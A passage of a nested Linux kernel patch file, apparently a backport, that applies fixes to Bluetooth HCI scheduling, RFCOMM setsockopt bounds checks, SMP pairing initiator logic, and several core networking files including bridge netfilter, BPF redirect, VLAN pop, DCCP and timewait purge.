+ 			hci_send_frame(hdev, skb);
+ 			hdev->le_last_tx = jiffies;
+ 
+-			cnt--;
++			(*cnt)--;
+ 			chan->sent++;
+ 			chan->conn->sent++;
+ 
+@@ -3776,12 +3781,7 @@ static void hci_sched_le(struct hci_dev *hdev)
+ 		}
+ 	}
+ 
+-	if (hdev->le_pkts)
+-		hdev->le_cnt = cnt;
+-	else
+-		hdev->acl_cnt = cnt;
+-
+-	if (cnt != tmp)
++	if (*cnt != tmp)
+ 		hci_prio_recalculate(hdev, LE_LINK);
+ }
+ 
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 76dac5a90aef0..5b8adfb36e207 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -3524,6 +3524,10 @@ static int pair_device(struct sock *sk, struct hci_dev *hdev, void *data,
+ 		 * will be kept and this function does nothing.
+ 		 */
+ 		p = hci_conn_params_add(hdev, &cp->addr.bdaddr, addr_type);
++		if (!p) {
++			err = -EIO;
++			goto unlock;
++		}
+ 
+ 		if (p->auto_connect == HCI_AUTO_CONN_EXPLICIT)
+ 			p->auto_connect = HCI_AUTO_CONN_DISABLED;
+diff --git a/net/bluetooth/rfcomm/sock.c b/net/bluetooth/rfcomm/sock.c
+index b54e8a530f55a..29aa07e9db9d7 100644
+--- a/net/bluetooth/rfcomm/sock.c
++++ b/net/bluetooth/rfcomm/sock.c
+@@ -629,7 +629,7 @@ static int rfcomm_sock_setsockopt_old(struct socket *sock, int optname,
+ 
+ 	switch (optname) {
+ 	case RFCOMM_LM:
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
++		if (bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen)) {
+ 			err = -EFAULT;
+ 			break;
+ 		}
+@@ -664,7 +664,6 @@ static int rfcomm_sock_setsockopt(struct socket *sock, int level, int optname,
+ 	struct sock *sk = sock->sk;
+ 	struct bt_security sec;
+ 	int err = 0;
+-	size_t len;
+ 	u32 opt;
+ 
+ 	BT_DBG("sk %p", sk);
+@@ -686,11 +685,9 @@ static int rfcomm_sock_setsockopt(struct socket *sock, int level, int optname,
+ 
+ 		sec.level = BT_SECURITY_LOW;
+ 
+-		len = min_t(unsigned int, sizeof(sec), optlen);
+-		if (copy_from_sockptr(&sec, optval, len)) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&sec, sizeof(sec), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (sec.level > BT_SECURITY_HIGH) {
+ 			err = -EINVAL;
+@@ -706,10 +703,9 @@ static int rfcomm_sock_setsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
+-		if (copy_from_sockptr(&opt, optval, sizeof(u32))) {
+-			err = -EFAULT;
++		err = bt_copy_from_sockptr(&opt, sizeof(opt), optval, optlen);
++		if (err)
+ 			break;
+-		}
+ 
+ 		if (opt)
+ 			set_bit(BT_SK_DEFER_SETUP, &bt_sk(sk)->flags);
+diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c
+index ecb005bce65ac..d444fa1bd9f97 100644
+--- a/net/bluetooth/smp.c
++++ b/net/bluetooth/smp.c
+@@ -913,7 +913,7 @@ static int tk_request(struct l2cap_conn *conn, u8 remote_oob, u8 auth,
+ 	 * Confirms and the responder Enters the passkey.
+ 	 */
+ 	if (smp->method == OVERLAP) {
+-		if (hcon->role == HCI_ROLE_MASTER)
++		if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 			smp->method = CFM_PASSKEY;
+ 		else
+ 			smp->method = REQ_PASSKEY;
+@@ -963,7 +963,7 @@ static u8 smp_confirm(struct smp_chan *smp)
+ 
+ 	smp_send_cmd(smp->conn, SMP_CMD_PAIRING_CONFIRM, sizeof(cp), &cp);
+ 
+-	if (conn->hcon->out)
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_CONFIRM);
+ 	else
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RANDOM);
+@@ -979,7 +979,8 @@ static u8 smp_random(struct smp_chan *smp)
+ 	int ret;
+ 
+ 	bt_dev_dbg(conn->hcon->hdev, "conn %p %s", conn,
+-		   conn->hcon->out ? "initiator" : "responder");
++		   test_bit(SMP_FLAG_INITIATOR, &smp->flags) ? "initiator" :
++		   "responder");
+ 
+ 	ret = smp_c1(smp->tk, smp->rrnd, smp->preq, smp->prsp,
+ 		     hcon->init_addr_type, &hcon->init_addr,
+@@ -993,7 +994,7 @@ static u8 smp_random(struct smp_chan *smp)
+ 		return SMP_CONFIRM_FAILED;
+ 	}
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		u8 stk[16];
+ 		__le64 rand = 0;
+ 		__le16 ediv = 0;
+@@ -1250,14 +1251,15 @@ static void smp_distribute_keys(struct smp_chan *smp)
+ 	rsp = (void *) &smp->prsp[1];
+ 
+ 	/* The responder sends its keys first */
+-	if (hcon->out && (smp->remote_key_dist & KEY_DIST_MASK)) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags) &&
++	    (smp->remote_key_dist & KEY_DIST_MASK)) {
+ 		smp_allow_key_dist(smp);
+ 		return;
+ 	}
+ 
+ 	req = (void *) &smp->preq[1];
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		keydist = &rsp->init_key_dist;
+ 		*keydist &= req->init_key_dist;
+ 	} else {
+@@ -1426,7 +1428,7 @@ static int sc_mackey_and_ltk(struct smp_chan *smp, u8 mackey[16], u8 ltk[16])
+ 	struct hci_conn *hcon = smp->conn->hcon;
+ 	u8 *na, *nb, a[7], b[7];
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		na   = smp->prnd;
+ 		nb   = smp->rrnd;
+ 	} else {
+@@ -1454,7 +1456,7 @@ static void sc_dhkey_check(struct smp_chan *smp)
+ 	a[6] = hcon->init_addr_type;
+ 	b[6] = hcon->resp_addr_type;
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		local_addr = a;
+ 		remote_addr = b;
+ 		memcpy(io_cap, &smp->preq[1], 3);
+@@ -1533,7 +1535,7 @@ static u8 sc_passkey_round(struct smp_chan *smp, u8 smp_op)
+ 		/* The round is only complete when the initiator
+ 		 * receives pairing random.
+ 		 */
+-		if (!hcon->out) {
++		if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 			smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM,
+ 				     sizeof(smp->prnd), smp->prnd);
+ 			if (smp->passkey_round == 20)
+@@ -1561,7 +1563,7 @@ static u8 sc_passkey_round(struct smp_chan *smp, u8 smp_op)
+ 
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RANDOM);
+ 
+-		if (hcon->out) {
++		if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 			smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM,
+ 				     sizeof(smp->prnd), smp->prnd);
+ 			return 0;
+@@ -1572,7 +1574,7 @@ static u8 sc_passkey_round(struct smp_chan *smp, u8 smp_op)
+ 	case SMP_CMD_PUBLIC_KEY:
+ 	default:
+ 		/* Initiating device starts the round */
+-		if (!hcon->out)
++		if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 			return 0;
+ 
+ 		bt_dev_dbg(hdev, "Starting passkey round %u",
+@@ -1617,7 +1619,7 @@ static int sc_user_reply(struct smp_chan *smp, u16 mgmt_op, __le32 passkey)
+ 	}
+ 
+ 	/* Initiator sends DHKey check first */
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		sc_dhkey_check(smp);
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_DHKEY_CHECK);
+ 	} else if (test_and_clear_bit(SMP_FLAG_DHKEY_PENDING, &smp->flags)) {
+@@ -1740,7 +1742,7 @@ static u8 smp_cmd_pairing_req(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	struct smp_cmd_pairing rsp, *req = (void *) skb->data;
+ 	struct l2cap_chan *chan = conn->smp;
+ 	struct hci_dev *hdev = conn->hcon->hdev;
+-	struct smp_chan *smp;
++	struct smp_chan *smp = chan->data;
+ 	u8 key_size, auth, sec_level;
+ 	int ret;
+ 
+@@ -1749,16 +1751,14 @@ static u8 smp_cmd_pairing_req(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (skb->len < sizeof(*req))
+ 		return SMP_INVALID_PARAMS;
+ 
+-	if (conn->hcon->role != HCI_ROLE_SLAVE)
++	if (smp && test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		return SMP_CMD_NOTSUPP;
+ 
+-	if (!chan->data)
++	if (!smp) {
+ 		smp = smp_chan_create(conn);
+-	else
+-		smp = chan->data;
+-
+-	if (!smp)
+-		return SMP_UNSPECIFIED;
++		if (!smp)
++			return SMP_UNSPECIFIED;
++	}
+ 
+ 	/* We didn't start the pairing, so match remote */
+ 	auth = req->auth_req & AUTH_REQ_MASK(hdev);
+@@ -1940,7 +1940,7 @@ static u8 smp_cmd_pairing_rsp(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (skb->len < sizeof(*rsp))
+ 		return SMP_INVALID_PARAMS;
+ 
+-	if (conn->hcon->role != HCI_ROLE_MASTER)
++	if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		return SMP_CMD_NOTSUPP;
+ 
+ 	skb_pull(skb, sizeof(*rsp));
+@@ -2035,7 +2035,7 @@ static u8 sc_check_confirm(struct smp_chan *smp)
+ 	if (smp->method == REQ_PASSKEY || smp->method == DSP_PASSKEY)
+ 		return sc_passkey_round(smp, SMP_CMD_PAIRING_CONFIRM);
+ 
+-	if (conn->hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM, sizeof(smp->prnd),
+ 			     smp->prnd);
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RANDOM);
+@@ -2057,7 +2057,7 @@ static int fixup_sc_false_positive(struct smp_chan *smp)
+ 	u8 auth;
+ 
+ 	/* The issue is only observed when we're in responder role */
+-	if (hcon->out)
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		return SMP_UNSPECIFIED;
+ 
+ 	if (hci_dev_test_flag(hdev, HCI_SC_ONLY)) {
+@@ -2093,7 +2093,8 @@ static u8 smp_cmd_pairing_confirm(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	struct hci_dev *hdev = hcon->hdev;
+ 
+ 	bt_dev_dbg(hdev, "conn %p %s", conn,
+-		   hcon->out ? "initiator" : "responder");
++		   test_bit(SMP_FLAG_INITIATOR, &smp->flags) ? "initiator" :
++		   "responder");
+ 
+ 	if (skb->len < sizeof(smp->pcnf))
+ 		return SMP_INVALID_PARAMS;
+@@ -2115,7 +2116,7 @@ static u8 smp_cmd_pairing_confirm(struct l2cap_conn *conn, struct sk_buff *skb)
+ 			return ret;
+ 	}
+ 
+-	if (conn->hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM, sizeof(smp->prnd),
+ 			     smp->prnd);
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RANDOM);
+@@ -2150,7 +2151,7 @@ static u8 smp_cmd_pairing_random(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (!test_bit(SMP_FLAG_SC, &smp->flags))
+ 		return smp_random(smp);
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		pkax = smp->local_pk;
+ 		pkbx = smp->remote_pk;
+ 		na   = smp->prnd;
+@@ -2163,7 +2164,7 @@ static u8 smp_cmd_pairing_random(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	}
+ 
+ 	if (smp->method == REQ_OOB) {
+-		if (!hcon->out)
++		if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 			smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM,
+ 				     sizeof(smp->prnd), smp->prnd);
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_DHKEY_CHECK);
+@@ -2174,7 +2175,7 @@ static u8 smp_cmd_pairing_random(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (smp->method == REQ_PASSKEY || smp->method == DSP_PASSKEY)
+ 		return sc_passkey_round(smp, SMP_CMD_PAIRING_RANDOM);
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		u8 cfm[16];
+ 
+ 		err = smp_f4(smp->tfm_cmac, smp->remote_pk, smp->local_pk,
+@@ -2215,7 +2216,7 @@ static u8 smp_cmd_pairing_random(struct l2cap_conn *conn, struct sk_buff *skb)
+ 		return SMP_UNSPECIFIED;
+ 
+ 	if (smp->method == REQ_OOB) {
+-		if (hcon->out) {
++		if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 			sc_dhkey_check(smp);
+ 			SMP_ALLOW_CMD(smp, SMP_CMD_DHKEY_CHECK);
+ 		}
+@@ -2289,10 +2290,27 @@ bool smp_sufficient_security(struct hci_conn *hcon, u8 sec_level,
+ 	return false;
+ }
+ 
++static void smp_send_pairing_req(struct smp_chan *smp, __u8 auth)
++{
++	struct smp_cmd_pairing cp;
++
++	if (smp->conn->hcon->type == ACL_LINK)
++		build_bredr_pairing_cmd(smp, &cp, NULL);
++	else
++		build_pairing_cmd(smp->conn, &cp, NULL, auth);
++
++	smp->preq[0] = SMP_CMD_PAIRING_REQ;
++	memcpy(&smp->preq[1], &cp, sizeof(cp));
++
++	smp_send_cmd(smp->conn, SMP_CMD_PAIRING_REQ, sizeof(cp), &cp);
++	SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RSP);
++
++	set_bit(SMP_FLAG_INITIATOR, &smp->flags);
++}
++
+ static u8 smp_cmd_security_req(struct l2cap_conn *conn, struct sk_buff *skb)
+ {
+ 	struct smp_cmd_security_req *rp = (void *) skb->data;
+-	struct smp_cmd_pairing cp;
+ 	struct hci_conn *hcon = conn->hcon;
+ 	struct hci_dev *hdev = hcon->hdev;
+ 	struct smp_chan *smp;
+@@ -2341,16 +2359,20 @@ static u8 smp_cmd_security_req(struct l2cap_conn *conn, struct sk_buff *skb)
+ 
+ 	skb_pull(skb, sizeof(*rp));
+ 
+-	memset(&cp, 0, sizeof(cp));
+-	build_pairing_cmd(conn, &cp, NULL, auth);
++	smp_send_pairing_req(smp, auth);
+ 
+-	smp->preq[0] = SMP_CMD_PAIRING_REQ;
+-	memcpy(&smp->preq[1], &cp, sizeof(cp));
++	return 0;
++}
+ 
+-	smp_send_cmd(conn, SMP_CMD_PAIRING_REQ, sizeof(cp), &cp);
+-	SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RSP);
++static void smp_send_security_req(struct smp_chan *smp, __u8 auth)
++{
++	struct smp_cmd_security_req cp;
+ 
+-	return 0;
++	cp.auth_req = auth;
++	smp_send_cmd(smp->conn, SMP_CMD_SECURITY_REQ, sizeof(cp), &cp);
++	SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_REQ);
++
++	clear_bit(SMP_FLAG_INITIATOR, &smp->flags);
+ }
+ 
+ int smp_conn_security(struct hci_conn *hcon, __u8 sec_level)
+@@ -2421,23 +2443,11 @@ int smp_conn_security(struct hci_conn *hcon, __u8 sec_level)
+ 			authreq |= SMP_AUTH_MITM;
+ 	}
+ 
+-	if (hcon->role == HCI_ROLE_MASTER) {
+-		struct smp_cmd_pairing cp;
+-
+-		build_pairing_cmd(conn, &cp, NULL, authreq);
+-		smp->preq[0] = SMP_CMD_PAIRING_REQ;
+-		memcpy(&smp->preq[1], &cp, sizeof(cp));
+-
+-		smp_send_cmd(conn, SMP_CMD_PAIRING_REQ, sizeof(cp), &cp);
+-		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RSP);
+-	} else {
+-		struct smp_cmd_security_req cp;
+-		cp.auth_req = authreq;
+-		smp_send_cmd(conn, SMP_CMD_SECURITY_REQ, sizeof(cp), &cp);
+-		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_REQ);
+-	}
++	if (hcon->role == HCI_ROLE_MASTER)
++		smp_send_pairing_req(smp, authreq);
++	else
++		smp_send_security_req(smp, authreq);
+ 
+-	set_bit(SMP_FLAG_INITIATOR, &smp->flags);
+ 	ret = 0;
+ 
+ unlock:
+@@ -2688,8 +2698,6 @@ static int smp_cmd_sign_info(struct l2cap_conn *conn, struct sk_buff *skb)
+ 
+ static u8 sc_select_method(struct smp_chan *smp)
+ {
+-	struct l2cap_conn *conn = smp->conn;
+-	struct hci_conn *hcon = conn->hcon;
+ 	struct smp_cmd_pairing *local, *remote;
+ 	u8 local_mitm, remote_mitm, local_io, remote_io, method;
+ 
+@@ -2702,7 +2710,7 @@ static u8 sc_select_method(struct smp_chan *smp)
+ 	 * the "struct smp_cmd_pairing" from them we need to skip the
+ 	 * first byte which contains the opcode.
+ 	 */
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		local = (void *) &smp->preq[1];
+ 		remote = (void *) &smp->prsp[1];
+ 	} else {
+@@ -2771,7 +2779,7 @@ static int smp_cmd_public_key(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	/* Non-initiating device sends its public key after receiving
+ 	 * the key from the initiating device.
+ 	 */
+-	if (!hcon->out) {
++	if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		err = sc_send_public_key(smp);
+ 		if (err)
+ 			return err;
+@@ -2833,7 +2841,7 @@ static int smp_cmd_public_key(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	}
+ 
+ 	if (smp->method == REQ_OOB) {
+-		if (hcon->out)
++		if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 			smp_send_cmd(conn, SMP_CMD_PAIRING_RANDOM,
+ 				     sizeof(smp->prnd), smp->prnd);
+ 
+@@ -2842,7 +2850,7 @@ static int smp_cmd_public_key(struct l2cap_conn *conn, struct sk_buff *skb)
+ 		return 0;
+ 	}
+ 
+-	if (hcon->out)
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_CONFIRM);
+ 
+ 	if (smp->method == REQ_PASSKEY) {
+@@ -2857,7 +2865,7 @@ static int smp_cmd_public_key(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	/* The Initiating device waits for the non-initiating device to
+ 	 * send the confirm value.
+ 	 */
+-	if (conn->hcon->out)
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags))
+ 		return 0;
+ 
+ 	err = smp_f4(smp->tfm_cmac, smp->local_pk, smp->remote_pk, smp->prnd,
+@@ -2891,7 +2899,7 @@ static int smp_cmd_dhkey_check(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	a[6] = hcon->init_addr_type;
+ 	b[6] = hcon->resp_addr_type;
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		local_addr = a;
+ 		remote_addr = b;
+ 		memcpy(io_cap, &smp->prsp[1], 3);
+@@ -2916,7 +2924,7 @@ static int smp_cmd_dhkey_check(struct l2cap_conn *conn, struct sk_buff *skb)
+ 	if (crypto_memneq(check->e, e, 16))
+ 		return SMP_DHKEY_CHECK_FAILED;
+ 
+-	if (!hcon->out) {
++	if (!test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		if (test_bit(SMP_FLAG_WAIT_USER, &smp->flags)) {
+ 			set_bit(SMP_FLAG_DHKEY_PENDING, &smp->flags);
+ 			return 0;
+@@ -2928,7 +2936,7 @@ static int smp_cmd_dhkey_check(struct l2cap_conn *conn, struct sk_buff *skb)
+ 
+ 	sc_add_ltk(smp);
+ 
+-	if (hcon->out) {
++	if (test_bit(SMP_FLAG_INITIATOR, &smp->flags)) {
+ 		hci_le_start_enc(hcon, 0, 0, smp->tk, smp->enc_key_size);
+ 		hcon->enc_key_size = smp->enc_key_size;
+ 	}
+@@ -3077,7 +3085,6 @@ static void bredr_pairing(struct l2cap_chan *chan)
+ 	struct l2cap_conn *conn = chan->conn;
+ 	struct hci_conn *hcon = conn->hcon;
+ 	struct hci_dev *hdev = hcon->hdev;
+-	struct smp_cmd_pairing req;
+ 	struct smp_chan *smp;
+ 
+ 	bt_dev_dbg(hdev, "chan %p", chan);
+@@ -3129,14 +3136,7 @@ static void bredr_pairing(struct l2cap_chan *chan)
+ 
+ 	bt_dev_dbg(hdev, "starting SMP over BR/EDR");
+ 
+-	/* Prepare and send the BR/EDR SMP Pairing Request */
+-	build_bredr_pairing_cmd(smp, &req, NULL);
+-
+-	smp->preq[0] = SMP_CMD_PAIRING_REQ;
+-	memcpy(&smp->preq[1], &req, sizeof(req));
+-
+-	smp_send_cmd(conn, SMP_CMD_PAIRING_REQ, sizeof(req), &req);
+-	SMP_ALLOW_CMD(smp, SMP_CMD_PAIRING_RSP);
++	smp_send_pairing_req(smp, 0x00);
+ }
+ 
+ static void smp_resume_cb(struct l2cap_chan *chan)
+diff --git a/net/bridge/br_netfilter_hooks.c b/net/bridge/br_netfilter_hooks.c
+index 9ac70c27da835..9229300881b5f 100644
+--- a/net/bridge/br_netfilter_hooks.c
++++ b/net/bridge/br_netfilter_hooks.c
+@@ -618,8 +618,12 @@ static unsigned int br_nf_local_in(void *priv,
+ 	if (likely(nf_ct_is_confirmed(ct)))
+ 		return NF_ACCEPT;
+ 
++	if (WARN_ON_ONCE(refcount_read(&nfct->use) != 1)) {
++		nf_reset_ct(skb);
++		return NF_ACCEPT;
++	}
++
+ 	WARN_ON_ONCE(skb_shared(skb));
+-	WARN_ON_ONCE(refcount_read(&nfct->use) != 1);
+ 
+ 	/* We can't call nf_confirm here, it would create a dependency
+ 	 * on nf_conntrack module.
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 210b881cb50b8..1cd5f146cafe4 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -2264,12 +2264,12 @@ static int __bpf_redirect_neigh_v6(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	err = bpf_out_neigh_v6(net, skb, dev, nh);
+ 	if (unlikely(net_xmit_eval(err)))
+-		dev->stats.tx_errors++;
++		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+ 	goto out_xmit;
+ out_drop:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ out_xmit:
+ 	return ret;
+@@ -2371,12 +2371,12 @@ static int __bpf_redirect_neigh_v4(struct sk_buff *skb, struct net_device *dev,
+ 
+ 	err = bpf_out_neigh_v4(net, skb, dev, nh);
+ 	if (unlikely(net_xmit_eval(err)))
+-		dev->stats.tx_errors++;
++		DEV_STATS_INC(dev, tx_errors);
+ 	else
+ 		ret = NET_XMIT_SUCCESS;
+ 	goto out_xmit;
+ out_drop:
+-	dev->stats.tx_errors++;
++	DEV_STATS_INC(dev, tx_errors);
+ 	kfree_skb(skb);
+ out_xmit:
+ 	return ret;
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 4d46788cd493a..768b8d65a5baa 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5791,7 +5791,6 @@ EXPORT_SYMBOL(skb_ensure_writable);
+  */
+ int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci)
+ {
+-	struct vlan_hdr *vhdr;
+ 	int offset = skb->data - skb_mac_header(skb);
+ 	int err;
+ 
+@@ -5807,13 +5806,8 @@ int __skb_vlan_pop(struct sk_buff *skb, u16 *vlan_tci)
+ 
+ 	skb_postpull_rcsum(skb, skb->data + (2 * ETH_ALEN), VLAN_HLEN);
+ 
+-	vhdr = (struct vlan_hdr *)(skb->data + ETH_HLEN);
+-	*vlan_tci = ntohs(vhdr->h_vlan_TCI);
+-
+-	memmove(skb->data + VLAN_HLEN, skb->data, 2 * ETH_ALEN);
+-	__skb_pull(skb, VLAN_HLEN);
++	vlan_remove_tag(skb, vlan_tci);
+ 
+-	vlan_set_encap_proto(skb, vhdr);
+ 	skb->mac_header += VLAN_HLEN;
+ 
+ 	if (skb_network_offset(skb) < ETH_HLEN)
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index f4a2dce3e1048..db8d54fb88060 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -1042,7 +1042,7 @@ static void __net_exit dccp_v4_exit_net(struct net *net)
+ 
+ static void __net_exit dccp_v4_exit_batch(struct list_head *net_exit_list)
+ {
+-	inet_twsk_purge(&dccp_hashinfo, AF_INET);
++	inet_twsk_purge(&dccp_hashinfo);
+ }
+ 
+ static struct pernet_operations dccp_v4_ops = {
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index 016af0301366d..d90bb941f2ada 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -1121,15 +1121,9 @@ static void __net_exit dccp_v6_exit_net(struct net *net)
+ 	inet_ctl_sock_destroy(pn->v6_ctl_sk);
+ }
+ 
+-static void __net_exit dccp_v6_exit_batch(struct list_head *net_exit_list)
+-{
+-	inet_twsk_purge(&dccp_hashinfo, AF_INET6);
+-}
+-
+ static struct pernet_operations dccp_v6_ops = {
+ 	.init   = dccp_v6_init_net,
+ 	.exit   = dccp_v6_exit_net,
+-	.exit_batch = dccp_v6_exit_batch,
+ 	.id	= &dccp_v6_pernet_id,
+ 	.size   = sizeof(struct dccp_v6_pernet),
+ };
+diff --git a/net/dsa/tag_ocelot.c b/net/dsa/tag_ocelot.c
+index 0d81f172b7a6e..ce9d2b20d67a9 100644
+--- a/net/dsa/tag_ocelot.c
++++ b/net/dsa/tag_ocelot.c
+@@ -4,40 +4,6 @@
+ #include <linux/dsa/ocelot.h>
+ #include "dsa_priv.h"
+ 
+-/* If the port is under a VLAN-aware bridge, remove the VLAN header from the
+- * payload and move it into the DSA tag, which will make the switch classify
+- * the packet to the bridge VLAN. Otherwise, leave the classified VLAN at zero,
+- * which is the pvid of standalone and VLAN-unaware bridge ports.
+- */
+-static void ocelot_xmit_get_vlan_info(struct sk_buff *skb, struct dsa_port *dp,
+-				      u64 *vlan_tci, u64 *tag_type)
+-{
+-	struct net_device *br = dsa_port_bridge_dev_get(dp);
+-	struct vlan_ethhdr *hdr;
+-	u16 proto, tci;
+-
+-	if (!br || !br_vlan_enabled(br)) {
+-		*vlan_tci = 0;
+-		*tag_type = IFH_TAG_TYPE_C;
+-		return;
+-	}
+-
+-	hdr = (struct vlan_ethhdr *)skb_mac_header(skb);
+-	br_vlan_get_proto(br, &proto);
+-
+-	if (ntohs(hdr->h_vlan_proto) == proto) {
+-		__skb_vlan_pop(skb, &tci);
+-		*vlan_tci = tci;
+-	} else {
+-		rcu_read_lock();
+-		br_vlan_get_pvid_rcu(br, &tci);
+-		rcu_read_unlock();
+-		*vlan_tci = tci;
+-	}
+-
+-	*tag_type = (proto != ETH_P_8021Q) ? IFH_TAG_TYPE_S : IFH_TAG_TYPE_C;
+-}
+-
+ static void ocelot_xmit_common(struct sk_buff *skb, struct net_device *netdev,
+ 			       __be32 ifh_prefix, void **ifh)
+ {
+@@ -49,7 +15,8 @@ static void ocelot_xmit_common(struct sk_buff *skb, struct net_device *netdev,
+ 	u32 rew_op = 0;
+ 	u64 qos_class;
+ 
+-	ocelot_xmit_get_vlan_info(skb, dp, &vlan_tci, &tag_type);
++	ocelot_xmit_get_vlan_info(skb, dsa_port_bridge_dev_get(dp), &vlan_tci,
++				  &tag_type);
+ 
+ 	qos_class = netdev_get_num_tc(netdev) ?
+ 		    netdev_get_prio_tc_map(netdev, skb->priority) : skb->priority;
+diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
+index 0c3c6d0cee290..358bff068eef8 100644
+--- a/net/ipv4/fou.c
++++ b/net/ipv4/fou.c
+@@ -431,7 +431,7 @@ static struct sk_buff *gue_gro_receive(struct sock *sk,
+ 
+ 	offloads = NAPI_GRO_CB(skb)->is_ipv6 ? inet6_offloads : inet_offloads;
+ 	ops = rcu_dereference(offloads[proto]);
+-	if (WARN_ON_ONCE(!ops || !ops->callbacks.gro_receive))
++	if (!ops || !ops->callbacks.gro_receive)
+ 		goto out;
+ 
+ 	pp = call_gro_receive(ops->callbacks.gro_receive, head, skb);
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index 340a8f0c29800..6356a8a47b345 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -282,14 +282,18 @@ void __inet_twsk_schedule(struct inet_timewait_sock *tw, int timeo, bool rearm)
+ EXPORT_SYMBOL_GPL(__inet_twsk_schedule);
+ 
+ /* Remove all non full sockets (TIME_WAIT and NEW_SYN_RECV) for dead netns */
+-void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family)
++void inet_twsk_purge(struct inet_hashinfo *hashinfo)
+ {
++	struct inet_ehash_bucket *head = &hashinfo->ehash[0];
++	unsigned int ehash_mask = hashinfo->ehash_mask;
+ 	struct hlist_nulls_node *node;
+ 	unsigned int slot;
+ 	struct sock *sk;
+ 
+-	for (slot = 0; slot <= hashinfo->ehash_mask; slot++) {
